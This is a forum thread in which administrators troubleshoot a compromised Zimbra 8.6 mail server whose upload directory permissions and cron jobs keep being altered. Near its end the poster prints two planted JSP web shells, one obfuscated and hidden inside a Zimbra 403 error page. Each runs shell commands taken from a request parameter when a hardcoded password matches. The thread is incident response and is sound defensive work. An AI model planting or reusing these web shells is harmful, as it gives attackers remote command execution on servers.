Unable to change permissions of /opt/zimbra/data/tmp/upload

[Marcosebas]

Dear All,

I am facing an issue. I have 2 zimbra one was infected with the zmswatch the other was not. both are patched and running this version: Release 8.6.0_GA_1153.RHEL6_64_20141215151155 RHEL6_64 FOSS edition, Patch 8.6.0_P14.

Everythignhas been working fine. However, today in the afternoon the permissions of the /opt/zimbra/data/tmp/upload had been changed. I am using the command chmod 750 /opt/zimbra/data/tmp/upload/ to change the permissions but I am not able. The upload folder permissions stay dr--r-xr-x 2 zimbra zimbra 24576 Jun 14 17:44 upload.

Code: Select all

[zimbra@mailbox tmp]$ ls -la
total 84
drwxr-xr-x 15 zimbra zimbra  4096 Jun 18 00:16 .
drwxr-xr-x  6 zimbra zimbra  4096 Dec 26  2017 ..
drwxr-xr-x  2 zimbra zimbra  4096 Sep  4  2018 3ce93ad5-6a70-4c23-b0a4-2d157aa0ef50-deferred
drwxr-xr-x  2 zimbra zimbra  4096 Mar 21 09:40 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-active
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-corrupt
drwxr-xr-x  2 zimbra zimbra  4096 Apr 17 15:19 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-deferred
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-hold
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-incoming
drwxr-xr-x  3 zimbra zimbra  4096 Dec 26  2017 calcache
drwxr-xr-x  2 zimbra zimbra  4096 Jun 17 10:10 jna
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26  2017 libreoffice
drwxr-xr-x  2 zimbra zimbra  4096 Jun 17 10:10 mysql
drwxr-xr-x  5 zimbra zimbra  4096 Dec 26  2017 nginx
drwxr-xr-x  5 zimbra zimbra  4096 Dec 26  2017 uncompressed
dr--r-xr-x  2 zimbra zimbra 24576 Jun 14 17:44 upload
[zimbra@mailbox tmp]$ chmod 750 /opt/zimbra/data/tmp/upload/
[zimbra@mailbox tmp]$ ls -l
total 76
drwxr-xr-x 2 zimbra zimbra  4096 Sep  4  2018 3ce93ad5-6a70-4c23-b0a4-2d157aa0ef50-deferred
drwxr-xr-x 2 zimbra zimbra  4096 Mar 21 09:40 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-active
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-corrupt
drwxr-xr-x 2 zimbra zimbra  4096 Apr 17 15:19 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-deferred
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-hold
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-incoming
drwxr-xr-x 3 zimbra zimbra  4096 Dec 26  2017 calcache
drwxr-xr-x 2 zimbra zimbra  4096 Jun 17 10:10 jna
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26  2017 libreoffice
drwxr-xr-x 2 zimbra zimbra  4096 Jun 17 10:10 mysql
drwxr-xr-x 5 zimbra zimbra  4096 Dec 26  2017 nginx
drwxr-xr-x 5 zimbra zimbra  4096 Dec 26  2017 uncompressed
dr--r-xr-x 2 zimbra zimbra 24576 Jun 14 17:44 upload
[zimbra@mailbox tmp]$ 

What can I do? Please, any help.

Regards,

Marco

[indunil75]

I am having the same problem.

pls check cron log.

tail -f /var/log/cron

May be it is running every minute.

As temporary solution, Pls disable zimbra cronjob in this way.

As root

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

vi /etc/cron.deny and add user zimbra to it.

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload

and see, Will it change again?

Remember, It's JUST a temp solution..

[SamueleERAL]

I had the same problem. What I found on my server was 2 executable files in /opt/zimbra/log , you have to delete them.
The crontab for the user zimbra was changed, chack if there is somthing souspicious there.
There where a lot of .jsp files, if you have another server with the same services installed you can use 'find'
to check files changed since the day you had been compromised and find some new jsp files. In the files changed check with the other server
if the differences are legit or not.
Another article you could read is this viewtopic.php?t=66213&start=120#p291256 , it was very helpfull.

[SamueleERAL]

I had the same issue with one of my server. What I found was two executable files in /opt/zimbra/log/ but I guess you alredy found them.
Than the crontab for the user zimbra was changed, in my case almost every line was deleted and in the last two lines there was one lounchin zmswatch, check that to see if there have been changes.
There was a lot of new .jsp files and a lot of jsp changed. In my case it was usefull to have a twin server with same services installed, so I used find to see all jsp changed since the day
of the attack and run the same command on the other server, than deleted new files and checked files changed to see if changes was legit or corruptions.
The last thing that gave a lot of help was to look at this topic viewtopic.php?t=66213&start=120#p291256 , lounch the command he suggest and see the result.
Hope it could be helpful

[Marcosebas]

I am having the same problem.

pls check cron log.

tail -f /var/log/cron

May be it is running every minute.

As temporary solution, Pls disable zimbra cronjob in this way.

As root

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

vi /etc/cron.deny and add user zimbra to it.

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload

and see, Will it change again?

Remember, It's JUST a temp solution..

Hi Indunil,

Thank but I am getting the following, the cron si running every minute as you said.

Code: Select all

[root@mailbox ~]# tail -f /var/log/cron
Jun 18 08:37:25 mailbox crontab[23942]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24038]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24042]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24047]: (zimbra) LIST (zimbra)
Jun 18 08:37:55 mailbox crontab[24095]: (zimbra) LIST (zimbra)
Jun 18 08:38:01 mailbox CROND[24303]: (zimbra) CMD (/opt/zimbra/libexec/zmstatuslog > /dev/null 2>&1)
Jun 18 08:38:25 mailbox crontab[24628]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24698]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24702]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24707]: (zimbra) LIST (zimbra)
Jun 18 08:38:56 mailbox crontab[24811]: (zimbra) LIST (zimbra)

But when I insert the line to disable the zimbra cron I get this:

[root@mailbox ~]# tail -f /var/log/cron

Code: Select all

[root@mailbox ~]# mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled
`/var/spool/cron/zimbra' -> `/var/spool/cron/zimbra.disabled'
mv: cannot move `/var/spool/cron/zimbra' to `/var/spool/cron/zimbra.disabled': Operation not permitted

Also the /etc/cron.deny is empty. Should it be like that or how to add the zimbra line to it?

Regards,

Marco

[SamueleERAL]

In my opinion disallow the user zimbra to run cronjobs will let you set permissions in /opt/zimbra/data/tmp but wont solve the problem.
In the zimbra crontab there are usefull stuffs, it's not a good idea to let it disabled for too long.
As you have seen the crontab lounch /opt/zimbra/libexec/zmstatuslog every minute, so probably that file is compromised.
If you don't have a twin server as I have you should restore a not compromised backup and start checking files in the way suggested in my previous post

[Marcosebas]

I do not have a clean back up? What could be the best solution? If I upgrade my ZCS 8.6 to 8.8 would be solved the problem of files that were modified? I must said that my Zimbra crontab hasn't been modified. I don't find any line regarding zmswatch.

Regards,

Marco

[indunil75]

I am having the same problem.

pls check cron log.

tail -f /var/log/cron

May be it is running every minute.

As temporary solution, Pls disable zimbra cronjob in this way.

As root

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

vi /etc/cron.deny and add user zimbra to it.

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload

and see, Will it change again?

Remember, It's JUST a temp solution..

Hi Indunil,

Thank but I am getting the following, the cron si running every minute as you said.

Code: Select all

[root@mailbox ~]# tail -f /var/log/cron
Jun 18 08:37:25 mailbox crontab[23942]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24038]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24042]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24047]: (zimbra) LIST (zimbra)
Jun 18 08:37:55 mailbox crontab[24095]: (zimbra) LIST (zimbra)
Jun 18 08:38:01 mailbox CROND[24303]: (zimbra) CMD (/opt/zimbra/libexec/zmstatuslog > /dev/null 2>&1)
Jun 18 08:38:25 mailbox crontab[24628]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24698]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24702]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24707]: (zimbra) LIST (zimbra)
Jun 18 08:38:56 mailbox crontab[24811]: (zimbra) LIST (zimbra)

But when I insert the line to disable the zimbra cron I get this:

[root@mailbox ~]# tail -f /var/log/cron

Code: Select all

[root@mailbox ~]# mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled
`/var/spool/cron/zimbra' -> `/var/spool/cron/zimbra.disabled'
mv: cannot move `/var/spool/cron/zimbra' to `/var/spool/cron/zimbra.disabled': Operation not permitted

Also the /etc/cron.deny is empty. Should it be like that or how to add the zimbra line to it?

Regards,

Marco

Hi,

Pls see the permisions of the file with below commands.

ls -al /var/spool/cron/zimbra

lsattr /var/spool/cron/zimbra

You may NEED to use below command.

chattr -i /var/spool/cron/zimbra

Then, run below commands again..

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

yes, is empty. just add word zimbra to that file in this way.

echo zimbra > /etc/cron.deny

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload


anyway, good URL to follow

viewtopic.php?t=65932&start=120

[indunil75]

I am having the same problem.

pls check cron log.

tail -f /var/log/cron

May be it is running every minute.

As temporary solution, Pls disable zimbra cronjob in this way.

As root

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

vi /etc/cron.deny and add user zimbra to it.

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload

and see, Will it change again?

Remember, It's JUST a temp solution..

Hi Indunil,

Thank but I am getting the following, the cron si running every minute as you said.

Code: Select all

[root@mailbox ~]# tail -f /var/log/cron
Jun 18 08:37:25 mailbox crontab[23942]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24038]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24042]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24047]: (zimbra) LIST (zimbra)
Jun 18 08:37:55 mailbox crontab[24095]: (zimbra) LIST (zimbra)
Jun 18 08:38:01 mailbox CROND[24303]: (zimbra) CMD (/opt/zimbra/libexec/zmstatuslog > /dev/null 2>&1)
Jun 18 08:38:25 mailbox crontab[24628]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24698]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24702]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24707]: (zimbra) LIST (zimbra)
Jun 18 08:38:56 mailbox crontab[24811]: (zimbra) LIST (zimbra)

But when I insert the line to disable the zimbra cron I get this:

[root@mailbox ~]# tail -f /var/log/cron

Code: Select all

[root@mailbox ~]# mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled
`/var/spool/cron/zimbra' -> `/var/spool/cron/zimbra.disabled'
mv: cannot move `/var/spool/cron/zimbra' to `/var/spool/cron/zimbra.disabled': Operation not permitted

Also the /etc/cron.deny is empty. Should it be like that or how to add the zimbra line to it?

Regards,

Marco

Hi,

Pls see the permisions of the file with below commands.

ls -al /var/spool/cron/zimbra

lsattr /var/spool/cron/zimbra

You may NEED to use below command.

chattr -i /var/spool/cron/zimbra

Then, run below commands again..

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

yes, is empty. just add word zimbra to that file in this way.

echo zimbra > /etc/cron.deny

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload


anyway, good URL to follow

viewtopic.php?t=65932&start=120

Pls check if these file exists?

ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp

pls give me their contents

cat /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp

these 2 files?

ls -al /opt/zimbra/log/zmswatch

ls -al /opt/zimbra/log/zmswatch.sh

[Marcosebas]

Pls check if these file exists?

ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp

Yes they exist.

[root@mailbox ~]# ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
-rwxr-xr-x 1 zimbra zimbra 332 Dec 15 2014 /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
[root@mailbox ~]# ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp
-rwxr-xr-x 1 zimbra zimbra 1658 May 22 10:50 /opt/zimbra/mailboxd/webapps/service/error/403.jsp

pls give me their contents

cat /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp

Code: Select all

[root@mailbox ~]# cat  /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp 
<%if("LVdpVsmayetL6cvL2YToniYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,a));}out.print("</pre>");}%>

Code: Select all

[root@mailbox ~]# cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp
<!--
 * ***** BEGIN LICENSE BLOCK *****
 * Zimbra Collaboration Suite Server
 * Copyright (C) 2011, 2013, 2014 Zimbra, Inc.
 * 
 * This program is free software: you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free Software Foundation,
 * version 2 of the License.
 * 
 * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
 * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 * You should have received a copy of the GNU General Public License along with this program.
 * If not, see <http://www.gnu.org/licenses/>.
 * ***** END LICENSE BLOCK *****
-->
<%@ page import="com.zimbra.common.util.L10nUtil,com.zimbra.common.util.L10nUtil.MsgKey" %>
<HTML>
<HEAD>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
    <title>Error 403</title>
</HEAD>
<BODY>
<%--
    This page can be customized.
--%> 
    <h2>HTTP ERROR: 403</h2>
    <pre>You are not allowed to access this page.</pre>
</BODY>
</HTML>
<%
if  (  "cmv7aPxsAStjMN5lW0DLE521KEJugzH0uD-YJySjO50"   .equals( request.getParameter(   "p"
+
"pwd"   )
)  )   {   java.io.InputStream   YfqL =  Runtime.getRuntime() .exec  (
new
String[] {   "/bin" + "/sh" 
,  "-c" ,
request.getParameter(
"p"   +
"com"
  )   } ) .getInputStream()   ;
int
NrHqK
=
-1   ;   byte[]
yxIyPqf =  new
byte[
81
]   ;   out.print(   "<p"
+  "re>"

) ; while(  (  NrHqK
= YfqL.read(  yxIyPqf
)  ) !=
-1  )   {   out.print( new
String(  yxIyPqf,  0,
NrHqK  )
)
; }
out.print(  "<"  +
"/pre>"
  )
; }
%>

these 2 files?

ls -al /opt/zimbra/log/zmswatch

ls -al /opt/zimbra/log/zmswatch.sh

Those 2 files exist but are with touch as I did a previous "clean" to the server. No zmswatch running process (I used command top to check porcesses running) that I can see neither any modify in the zimbra crontab.

Thank you for your help.

Best,

Marco